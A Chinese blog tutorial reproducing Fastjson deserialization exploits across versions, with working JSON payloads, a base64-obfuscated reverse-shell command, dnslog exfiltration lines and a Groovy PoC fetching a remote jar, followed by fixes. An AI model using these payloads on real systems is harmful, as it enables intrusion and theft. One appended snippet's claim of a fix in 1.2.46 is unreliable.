fastjson反序列化漏洞原理及<=1.2.24&<=1.2.47&Fastjson v1.2.80简单利用&不出网判断&修复方法

已于 2024-07-28 15:09:40 修改
阅读量622 收藏 17
点赞数 20
文章标签: 安全 web安全
于 2024-07-27 18:27:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70535581/article/details/140736867
版权
1、什么是fastjson

fastjson 是一个 有阿里开发的一个开源Java 类库,可以将 Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。

2、漏洞原理

!!!! fastjson为了读取并判断传入的值是什么类型,增加了autotype机制导致了漏洞产生。

FastJson在解析json的过程中,⽀持使⽤autoType来实例化某⼀个具体的类, 并调⽤该类的set/get⽅法来访问属性。通过查找代码中相关的⽅法,即可构造出⼀些恶意利⽤链。通俗理解就是:漏洞利⽤fastjson autotype在处理json对象的时候,未对@type字段进⾏完全的安全性验 证,攻击者可以传⼊危险类,并调⽤危险类连接远程rmi主机,通过其中的恶意类执⾏代码

3、AutoType 功能
  • AutoType 允许在反序列化过程中使用 Java 类的全限定名来标识对象类型。默认情况下,Fastjson 的 AutoType 功能是关闭的,这是为了防止恶意构造的序列化数据利用类名执行恶意代码。

从历史爆出来的FastJson反序列化漏洞可以看出漏洞利用主要集中在如下的2个方面。

  • 寻找新的利用链,绕过黑名单;
  • 寻找绕过AutoType的方式;
4、payload以及漏洞复现

1、尝试是否存在fastjson反序列化漏洞,构造以下payload看到了版本信息:

Set[{"@type":"java.net.URL","val":"http://dnslog"}]

Set[{"@type":"java.net.URL","val":"http://dnslog"}

在1.2.47版本之前,基本是对于checkAutoType中黑名单的绕过和修补,

常见的有sun官方提供的一个类com.sun.rowset.JdbcRowSetImpl,其中有个dataSourceName方法支持传入一个rmi的源,只要解析其中的url就会支持远程调用。

FastJson<=1.2.24

{ "@type":"com.sun.rowset.JdbcRowSetImpl;", "dataSourceName":"ldap://127.0.0.1/123", "autoCommit":true }

直到1.2.47版本,出现了新的利用姿势,无需开启AutoTypeSupport也可利用。

利用过程分两段,通过白名单java.lang.Class,先将目标类加载到Map中缓存,后面加载恶意类时可以直接从这个mappings中取出,从而“另辟蹊径”,完全绕过checkAutoType。

FastJson<=1.2.47

{

"axin":{

"@type":"java.lang.Class",

"val":"com.sun.rowset.JdbcRowSetImpl"

},

"is":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://192.168.80.141:1099/slgipa",

"autoCommit":true

}

}

2、可以看到版本号为1.2.45

3、直接使用FastJson<=1.2.47payload即可,这里用到的JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具。本地起一个监听端口用于反弹shell。利用JNDI-Injection-Exploit工具开启rmi服务器,-C 需要执行的命令:bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMTk2LjEzMC8xMjM0IDA+JjEK}|{base64,-d}|{bash,-i},将上面payload替换到上面测试版本号的数据包中,发送POC到FastJson服务器,通过RMI协议远程加载恶意类。成功反弹shell。

4、fastjson不出网判断

1)网站目录写文件/静态资源(需要知道网站路径)。

2)通过dnslog进行数据外带

3)直接将命令执行结果回显到请求Poc的HTTP响应中

目标Linux效果:把上面弹shell的命令换成将执行命令写入文件中。

dnslog外带:ping `whoami` .xxxx.dnslog.cn

目标windows效果:

dnslog外带:ping %USERNAME% .xxxx.dnslog.cn

5、Fastjson v1.2.80 存在 AutoType 绕过反序列化漏洞

漏洞在特定条件下可以绕过默认关闭的 AutoType 限制,结合一个新的利用链,可实现 RCE 。

  • 默认关闭的 AutoType
  • Fastjson 默认情况下不启用 AutoType 功能。这意味着在反序列化过程中,Fastjson 不会接受并使用 Java 类的全限定名来标识和实例化对象类型。这样做是出于安全考虑,以防止恶意构造的序列化数据利用类名执行恶意代码。所以上面说的com.sun.rowset.JdbcRowSetImpl就不行了,只能调用其他类了,也就是用到依赖,主要是看引用库里面的jar包,例如项目中引用了groovy,fastjson1.2.76-1.2.80,依赖groovy,就可以用groovy poc去利用。
  • 例如:groovy利用(网上有不少这种利用链的poc)。
  • poc1
{    "@type":"java.lang.Exception",    "@type":"org.codehaus.groovy.control.CompilationFailedException",    "unit":{}}

 poc2

{    "@type":"org.codehaus.groovy.control.ProcessingUnit",    "@type":"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit",    "config":{        "@type":"org.codehaus.groovy.control.CompilerConfiguration",        "classpathList":"http://127.0.0.1:81/attack-1.jar"    }}

jar包写法https://github.com/Lonely-night/fastjsonVul/tree/7f9d2d8ea1c27ae1f9c06076849ae76c25b6aff7

6、修复方案

1、safeMode加固:Fastjson在1.2.68及之后的版本中引入了safeMode,配置safeMode后,无论白名单和黑名单,都不支持 autoType,可杜绝反序列化gadgets类变种攻击。

2、升级最新版本

Two and a half years
关注
  • 20
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
然而,Fastjson 1.2.69 版本存在一个严重的反序列化远程代码执行漏洞,这使得攻击者有可能通过精心构造的输入数据,绕过防御机制,执行任意远程代码,对服务器的安全构成重大威胁。 **漏洞原理** Fastjson 在处理 ...
fastjson-1.2.83 针对近期阿里fastjson漏洞,升级解决
05-24
Fastjson 1.2.80 及之前版本使用黑白名单用于防御反序列化漏洞,经研究该防御策略在特定条件下可绕过默认 autoType 关闭限制,攻击远程服务器,风险影响较大。建议 Fastjson 用户尽快采取安全措施保障系统安全
Fastjson历史反序列漏洞分析(1.2.24-1.2.80)
dreamthe的博客
08-10 5784
本文章总结fastjson1.2.241.2.80所产生的反序列化漏洞,将其进行分析。希望多大家有帮助。
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2422
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。
fastjson反序列化漏洞
Kevin's Blog
06-04 8325
文章目录一、fastjson 1.2.24反序列化漏洞1.1 漏洞简介1.1.1 漏洞阐述1.1.2 影响范围1.1.4 漏洞原理1.1.3 限制条件1.2 环境搭建1.3 漏洞利用1.4 防御建议二、fastjson 1.2.47反序列化漏洞 一、fastjson 1.2.24反序列化漏洞 1.1 漏洞简介 1.1.1 漏洞阐述   FastJson是alibaba开源的一款开源的高性能的JSON库,用于将java对象转换为json形式,也可以用来将json转换为java对象,很多公司都在使用,于201
Fastjson反序列化漏洞复现小结
GhostdomY的博客
10-26 2252
fastjson漏洞复现
Fastjson=1.2.47-RCE反序列化漏洞(CNVD‐2019‐22238)保姆级教程
精品博客,你值得一看~
08-10 542
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件 开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流 程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也 就是通常所指的“Gadget”),则会造成一些严重的安全问题。
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6300
简单讲解Fastjson反序列化漏洞简单讲述漏洞利用shell
java代码审计之fastjson反序列化漏洞
CheatMyself的博客
05-30 930
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。该产品主要提供了两个接口,JSON.toJSONString和JSON.parseObject/JSON.parse分别实现序列化和反序列化
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson<=1.2.47反序列化漏洞为例 1、此时/tmp目录 ![img]...
fastjson-1.2.76.jar
06-29
fastjson-1.2.76.jar
Fastjson反序列化漏洞史1
08-03
然而,Fastjson在过去的几年里曾曝出一系列的反序列化漏洞,这些漏洞可能被攻击者利用,执行任意代码,从而对系统安全构成威胁。 在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的...
微软蓝屏事件引发对构建更加稳固和安全络环境的思考
lupai的博客
07-24 428
综上所述,构建更加稳固和安全络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的安全防护体系。构建更加稳固和安全络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对络攻击和突发事件的能力。鼓励和支持安全技术的研发和创新,推动新技术在安全领域的应用和推广。加强对用户的安全教育,提高用户的安全意识和防范能力。
络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1074
络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
大坝安全监测设备有哪些主要功能?
yyth13276363312的博客
07-24 307
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
安全:IPC横向
8888的博客
07-23 691
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 1131
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
深入探讨:如何在Shopee平台上安全运营多个店铺?
最新发布
Ssm2022的博客
07-24 586
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
Fastjson是一款Java语言编写的高性能JSON处理器,被广泛应用于各种Java应用程序中。然而,Fastjson存在反序列化漏洞,黑客可以利用漏洞实现远程代码执行,因此该漏洞被广泛利用。 检测Fastjson反序列化漏洞方法: 1. 扫描源代码,搜索是否存在Fastjson相关的反序列化代码,如果存在,则需要仔细检查反序列化的过程是否安全。 2. 使用工具进行扫描:目前市面上有很多漏洞扫描工具已经支持Fastjson反序列化漏洞的检测,例如:AWVS、Nessus、Burp Suite等。 利用Fastjson反序列化漏洞方法: 1. 利用Fastjson反序列化漏洞执行远程命令:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现远程命令执行。 2. 利用Fastjson反序列化漏洞实现文件读取:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现文件读取操作。 3. 利用Fastjson反序列化漏洞实现反弹Shell:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现反弹Shell操作。 防范Fastjson反序列化漏洞方法: 1. 更新Fastjson版本:Fastjson官方在1.2.46版本中修复反序列化漏洞,建议使用该版本或更高版本。 2. 禁止使用Fastjson反序列化:如果应用程序中不需要使用Fastjson反序列化功能,建议禁止使用该功能,可以使用其他JSON处理器。 3. 输入验证:对所有输入进行校验和过滤,确保输入数据符合预期,避免恶意数据进入系统。 4. 序列化过滤:对敏感数据进行序列化过滤,确保敏感数据不会被序列化。 5. 安全加固:对系统进行安全加固,如限制系统权限、加强访问控制等,避免黑客利用Fastjson反序列化漏洞获取系统权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值